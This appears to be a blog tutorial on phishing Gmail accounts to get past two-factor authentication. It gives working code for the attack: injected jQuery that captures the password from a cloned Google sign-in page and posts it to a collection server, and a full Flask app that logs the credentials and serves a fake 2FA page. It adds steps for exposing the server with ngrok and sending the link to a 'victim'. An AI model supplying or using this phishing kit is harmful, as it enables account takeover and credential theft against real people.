HOW TO BYPASS GMAIL 2FA(TWO FACTOR AUTHENTICATION)
Security

HOW TO BYPASS GMAIL 2FA

Posted on by

Table of Contents

Initially we should know about some basics of phishing attack, It is the base techinque we use here to gain password of victim.

REQUIREMENTS

1)KALI LINUX

2)SUBLIME TEXT EDITOR

3)NGROK

STEP 1:

Initially use your browser and search for google sign in.

STEP 2:

Type the mail id you wanna hack, after entering the mail id and click next.

Bypass Gmail 2Fa

STEP 3:

After entering the mail id and right click the mouse and click inspect.

How to Bypass Gmail 2Fa

STEP 4:

after clicking inspect element ,go to inspector tab or element tab and right click and click the option called EDIT AS HTML,copy all html codes.

STEP 5:

paste it on sublime text editor and add some script at the end of the html tag.

ill drop the code here:

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
    $('button').click(function(e){
      e.preventDefault()
      auth=$('input[type=password]').val()
      $.post(
        "http://localhost:5000/auth",
        {"password":auth},
        function(data, status){
          window.location="http://localhost:5000/login"
        }
        );
      return false;
        })
</script>
</html>

save this file as login.html

NOTE:

do it same for 2 factor authentication page 

STEP 6:

next we need to write a python code that fetch deets from victim. And save it as app.py

ill give the code below

app.py

#!/usr/bin/env python3

from flask import Flask, render_template, send_file, make_response, request

app = Flask(__name__)

@app.route(“/auth”, methods=[“POST”])

def auth():

    print(request.form.to_dict())

    return “ok”

@app.route(“/”)

def index():

    response = make_response(send_file(“templates/login.html”))

    response.headers.add(“Access-Control-Allow-Origin”, “*”)

    return response

@app.route(“/login”)

def login():

    return send_file(“templates/2fa.html”)

if __name__ == “__main__”:

    app.run()

STEP 7:

open terminal in linux and type as i did and configure the ngrok

ngrok command

STEP 8:

And send the link in  mail to victim, BOOM…….!!!! youve got a password.

Leave a Reply

en English
af Afrikaanssq Albanianam Amharicar Arabichy Armenianaz Azerbaijanieu Basquebe Belarusianbn Bengalibs Bosnianbg Bulgarianca Catalanceb Cebuanony Chichewazh-CN Chinese (Simplified)zh-TW Chinese (Traditional)co Corsicanhr Croatiancs Czechda Danishnl Dutchen Englisheo Esperantoet Estoniantl Filipinofi Finnishfr Frenchfy Frisiangl Galicianka Georgiande Germanel Greekgu Gujaratiht Haitian Creoleha Hausahaw Hawaiianiw Hebrewhi Hindihmn Hmonghu Hungarianis Icelandicig Igboid Indonesianga Irishit Italianja Japanesejw Javanesekn Kannadakk Kazakhkm Khmerko Koreanku Kurdish (Kurmanji)ky Kyrgyzlo Laola Latinlv Latvianlt Lithuanianlb Luxembourgishmk Macedonianmg Malagasyms Malayml Malayalammt Maltesemi Maorimr Marathimn Mongolianmy Myanmar (Burmese)ne Nepalino Norwegianps Pashtofa Persianpl Polishpt Portuguesepa Punjabiro Romanianru Russiansm Samoangd Scottish Gaelicsr Serbianst Sesothosn Shonasd Sindhisi Sinhalask Slovaksl Slovenianso Somalies Spanishsu Sudanesesw Swahilisv Swedishtg Tajikta Tamilte Teluguth Thaitr Turkishuk Ukrainianur Urduuz Uzbekvi Vietnamesecy Welshxh Xhosayi Yiddishyo Yorubazu Zulu